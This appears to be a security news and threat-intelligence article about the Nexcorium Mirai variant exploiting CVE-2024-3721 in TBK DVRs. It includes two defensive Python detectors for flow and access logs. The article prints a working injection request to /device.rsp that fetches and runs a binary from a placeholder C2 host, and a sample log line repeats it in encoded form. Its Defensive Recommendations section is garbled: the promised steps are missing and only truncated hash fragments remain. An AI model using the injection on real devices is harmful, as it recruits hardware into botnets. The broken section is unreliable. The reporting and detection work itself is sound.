# Mirai Variant Nexcorium Exploits CVE-2024-3721 to Hijack TBK DVRs for DDoS Botnet
Threat actors are actively weaponizing a medium-severity command injection flaw in TBK Vision digital video recorders to conscript thousands of surveillance devices into a sprawling Mirai-based botnet, according to new telemetry from Fortinet FortiGuard Labs and Palo Alto Networks Unit 42. The campaign, which also sweeps up end-of-life TP-Link Wi-Fi routers, underscores how decade-old malware continues to thrive on the back of unpatched, internet-exposed consumer and small-business hardware.
## Background and Context
The operation centers on CVE-2024-3721, a command injection vulnerability carrying a CVSS score of 6.3 that affects TBK DVR-4104 and DVR-4216 surveillance appliances — devices widely deployed across retail stores, warehouses, and small office environments. The flaw, originally disclosed by Turkish security researcher Netsecfish in April 2024, resides in the device's web management interface and allows an unauthenticated attacker to inject arbitrary operating system commands via a crafted POST request to the /device.rsp endpoint. TBK has not released a firmware patch, and because the affected DVR lines have been rebranded and resold under numerous labels — including Novo, CeNova, QSee, Pulnix, XVR 5 in 1, Securus, Night OWL, and DVR Login — the true population of vulnerable units is difficult to enumerate. Shodan scans referenced by researchers estimate more than 50,000 exposed devices worldwide.
Parallel to the TBK campaign, Unit 42 has tracked a separate Mirai strain dubbed Nexcorium (also reported as "Neterbian" in some threat intelligence feeds) targeting end-of-life TP-Link Archer series routers, including the AX21 and C1200 models. Together, the two infection vectors illustrate an increasingly common pattern: botnet operators no longer need novel zero-days when an abundant long-tail of abandoned IoT firmware remains perpetually online.
## Technical Details
CVE-2024-3721 lives in the time and language parameters of the DVR's /device.rsp endpoint, which feeds user-supplied input directly into a shell invocation without sanitization. A minimal exploit request looks roughly like:
```http
POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /tmp; wget http://<C2>/arm7; chmod +x arm7; ./arm7
```

Once executed, the payload fetches an architecture-appropriate Mirai binary from the attacker's staging server — researchers have observed ARM, MIPS, SPARC, and x86 variants — and drops it into /tmp before chaining into execution. The Nexcorium variant deviates from classic Mirai in several ways: it uses a hardened string-encryption routine employing a rotating XOR key rather than the canonical single-byte 0x22 key, refuses to run inside virtualized environments by checking for QEMU-specific artifacts in /proc/cpuinfo, and establishes C2 over a custom binary protocol on TCP/2626 instead of the default 23/5555 ports that defenders historically monitor.
Post-infection, the bot enumerates available network interfaces, disables the watchdog timer to survive reboots, and kills competing malware — including Gafgyt, Hajime, and earlier Mirai forks — by walking /proc and terminating processes bound to known botnet ports. It then begins scanning adjacent IP ranges for additional vulnerable DVRs and routers, propagating laterally while simultaneously awaiting DDoS commands. FortiGuard observed UDP flood, TCP SYN flood, GRE flood, and HTTP GET/POST attack modules in the samples analyzed, along with an application-layer "bypass" module tuned to defeat Cloudflare's JavaScript challenge.
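As an added example (not from the FortiGuard or Unit 42 write-ups), the following Python script looks for the two post-infection behaviours described above in network flow records from a camera segment: the outbound beacon to the custom C2 port TCP/2626, and the lateral sweep of adjacent ranges (one source fanning out to many distinct destinations on one port in a short window). The camera-VLAN prefix, the sample flow records, the scan threshold and the window length are constructed assumptions.

```python
"""Surface Nexcorium-style post-infection behaviour in flow records.

Two behaviours from the analysis above: the C2 beacon on TCP/2626, and lateral
scanning of adjacent ranges (one source fanning out to many distinct
destinations on one port in a short window). Flow records, the camera-VLAN
prefix and the thresholds are constructed assumptions for this example.
"""
from collections import defaultdict
from ipaddress import ip_address, ip_network

CAMERA_VLAN = ip_network('10.20.5.0/24')  # assumed segment holding the DVRs
C2_PORT = 2626                             # custom C2 port reported for Nexcorium
SCAN_MIN_TARGETS = 20                      # assumed: distinct destinations per window
SCAN_WINDOW_S = 60                         # assumed: window length in seconds

# Flow record: (epoch_seconds, src, dst, proto, dst_port). Constructed sample:
# 10.20.5.7 beacons to a C2 and sweeps 10.20.6.0/24 on port 80; 10.20.5.8 is a
# healthy DVR streaming RTSP to the NVR and syncing NTP.
SAMPLE_FLOWS = [
    (990, '10.20.5.7', '198.51.100.77', 'tcp', 2626),
    (995, '10.20.5.8', '10.20.5.2', 'tcp', 554),
    (996, '10.20.5.8', '10.20.5.1', 'udp', 123),
    (1001, '10.20.5.8', '10.20.6.5', 'tcp', 80),
] + [(1000 + i, '10.20.5.7', f'10.20.6.{i + 1}', 'tcp', 80) for i in range(30)]


def detect_c2_beacons(flows):
    """Hosts on the camera VLAN opening TCP connections to the C2 port outside it."""
    hits = set()
    for _ts, src, dst, proto, dport in flows:
        if (proto == 'tcp' and dport == C2_PORT
                and ip_address(src) in CAMERA_VLAN
                and ip_address(dst) not in CAMERA_VLAN):
            hits.add(src)
    return hits


def detect_scanners(flows, min_targets=SCAN_MIN_TARGETS, window=SCAN_WINDOW_S):
    """Map src -> (dst_port, peak distinct destinations) for VLAN hosts whose
    fan-out on one TCP port within `window` seconds reaches min_targets."""
    events = defaultdict(list)  # (src, dport) -> [(ts, dst)], time-sorted
    for ts, src, dst, proto, dport in sorted(flows):
        if proto == 'tcp' and ip_address(src) in CAMERA_VLAN:
            events[(src, dport)].append((ts, dst))
    result = {}
    for (src, dport), evs in events.items():
        peak = 0
        for i, (t0, _dst) in enumerate(evs):
            # distinct destinations reached within `window` seconds of this flow
            targets = {dst for ts, dst in evs[i:] if ts - t0 <= window}
            peak = max(peak, len(targets))
        if peak >= min_targets and peak > result.get(src, (None, 0))[1]:
            result[src] = (dport, peak)
    return result


if __name__ == '__main__':
    print('C2 beacons from:', sorted(detect_c2_beacons(SAMPLE_FLOWS)))
    print('Scanners:', detect_scanners(SAMPLE_FLOWS))
```

The beacon check is deliberately scoped to the DVR segment: a hit there is a high-confidence indicator because nothing on a camera VLAN has a legitimate reason to open TCP/2626 to the internet, whereas the same rule applied network-wide would need an allow-list. The scan detector keys on fan-out per port rather than on any payload, so it still fires when the bot switches exploit modules.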
## Real-World Impact
The most immediate consequence is the availability of a fresh, high-bandwidth DDoS-for-hire resource. Compromised DVRs typically sit on symmetric or near-symmetric small-business broadband links — often 100 Mbps to 1 Gbps — and their owners rarely notice performance degradation because video recording continues uninterrupted. FortiGuard telemetry shows Nexcorium-attributed attack traffic peaking at 1.2 Tbps against a single target in late March 2026, placing it among the larger volumetric events of the quarter.
Beyond DDoS, compromised surveillance hardware poses a more insidious risk: lateral visibility into physical premises. While the current Nexcorium payload does not include video-exfiltration modules, the same command-injection primitive that drops the bot can just as easily dump RTSP credentials, archive footage, or pivot onto the device's management VLAN. Organizations running TBK-based camera systems in cash-handling, pharmacy, or restricted-access environments should treat a confirmed infection as a potential physical-security incident, not merely a network nuisance.
The TP-Link vector broadens the blast radius into residential and remote-worker environments. Archer AX21 and C1200 units reached end-of-life in 2023 and 2022 respectively, meaning there is no vendor-supplied remediation path; affected households and small offices must replace the hardware or isolate it behind an upstream firewall.
## Threat Actor Context
Unit 42 attributes the Nexcorium campaign to a financially motivated cluster it tracks as CL-CRI-1023, whose infrastructure overlaps with prior InfectedSlurs and Condi botnet operations. The group is believed to rent out botnet capacity on Russian- and Mandarin-language forums under the handle "nexcor," advertising 900 Gbps L4 floods for $450 per week. Payment is accepted exclusively in Monero routed through known mixing services. Command-and-control servers have rotated across bulletproof hosting providers in Moldova, Seychelles, and, more recently, compromised VPS instances in Brazil, making takedowns challenging.
No evidence currently links Nexcorium to state-sponsored activity, though researchers caution that Mirai source code has been forked so extensively since its 2016 leak that conclusive attribution based on code similarity alone is unreliable.
## Defensive Recommendations
Organizations operating TBK or rebranded DVRs should take the following steps immediately:
a4e8d2...b91c (ARM7 payload) and 7f3a09...dd12 (MIPS payload).

Detection engineers should add Suricata signatures matching the /device.rsp?opt=sys pattern with non-alphanumeric payloads in mdc, and Sigma rules for processes spawned by the DVR's embedded web server writing binaries to /tmp.
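An added example, not part of the original article or of any vendor's signature set: a Python check that applies the same logic the Suricata recommendation describes (request path /device.rsp, opt=sys, non-alphanumeric content in the mdc parameter) to web-server access-log lines, so the pattern can be validated against historical logs before a network signature is deployed. The log lines, client addresses and the staging hostname stage.invalid are constructed.

```python
"""Flag CVE-2024-3721 exploitation attempts against /device.rsp in access logs.

Same logic as the Suricata recommendation: path is /device.rsp, opt=sys, and the
mdc parameter carries non-alphanumeric (shell metacharacter) content. The log
lines below are constructed samples; stage.invalid is a placeholder host.
"""
import re
from urllib.parse import urlsplit, parse_qs

# Common Log Format: client ident user [time] "METHOD target PROTO" status bytes
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# A legitimate mdc value is a bare command token; ';', '|', '&', '$', '`', '/',
# whitespace or quotes have no business there and indicate injection.
BENIGN_MDC = re.compile(r'^[A-Za-z0-9_-]*$')

# Constructed sample: one benign user-menu call, one exploitation attempt,
# one benign sys call with a plain token, one unrelated page fetch.
SAMPLE_LOG = [
    '10.20.5.7 - - [14/Apr/2026:09:12:01 +0000] "GET /device.rsp?opt=user&cmd=list HTTP/1.1" 200 512',
    '203.0.113.9 - - [14/Apr/2026:09:12:44 +0000] "POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___'
    '&mdb=sos&mdc=cd%20%2Ftmp%3Bwget%20http%3A%2F%2Fstage.invalid%2Farm7 HTTP/1.1" 200 0',
    '10.20.5.7 - - [14/Apr/2026:09:13:05 +0000] "GET /device.rsp?opt=sys&cmd=status&mdb=sos&mdc=reboot HTTP/1.1" 200 18',
    '198.51.100.4 - - [14/Apr/2026:09:14:22 +0000] "GET /index.html HTTP/1.1" 200 2048',
]


def classify(line):
    """Parse one access-log line; return None if unparseable, else a dict with
    'alert' set when the request matches the exploitation pattern."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group('target'))
    rec = {'src': m.group('src'), 'method': m.group('method'),
           'status': int(m.group('status')), 'path': parts.path, 'alert': False}
    if parts.path != '/device.rsp':
        return rec
    qs = parse_qs(parts.query, keep_blank_values=True)   # percent-decodes values
    opt = qs.get('opt', [''])[0]
    mdc = qs.get('mdc', [''])[0]
    rec.update(opt=opt, mdc=mdc)
    rec['alert'] = opt == 'sys' and BENIGN_MDC.match(mdc) is None
    return rec


def scan(lines):
    """Return the records that match, in log order."""
    return [r for r in map(classify, lines) if r and r['alert']]


if __name__ == '__main__':
    for hit in scan(SAMPLE_LOG):
        print(f"{hit['src']} {hit['method']} {hit['path']} "
              f"status={hit['status']} mdc={hit['mdc']!r}")
```

Matching on the decoded parameter rather than on raw bytes matters: the payload arrives percent-encoded, so a signature that looks for a literal ";" or "wget" in the request line misses it, while a check on the decoded mdc value catches both plain and encoded forms. A 200 status on a flagged request is worth escalating, since the DVR does not reject the injected command.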
## Industry Response
CISA has not yet issued a formal advisory on CVE-2024-3721, though the vulnerability was added to its Known Exploited Vulnerabilities catalog on April 14, 2026, with a federal remediation deadline of May 5. The Shadowserver Foundation began daily scans for exposed TBK interfaces in early April and is notifying national CERTs of affected IP ownership. Fortinet, Palo Alto Networks, and Akamai have updated their managed DDoS and IPS signatures to cover Nexcorium's exploitation traffic and C2 protocol.
TBK Vision did not respond to multiple requests for comment from security researchers. TP-Link, for its part, reiterated that the affected Archer models are end-of-life and directed customers to successor products — a response that, while technically accurate, leaves millions of installed units without a viable remediation path and ensures Nexcorium's recruitment pool will remain well-stocked for the foreseeable future.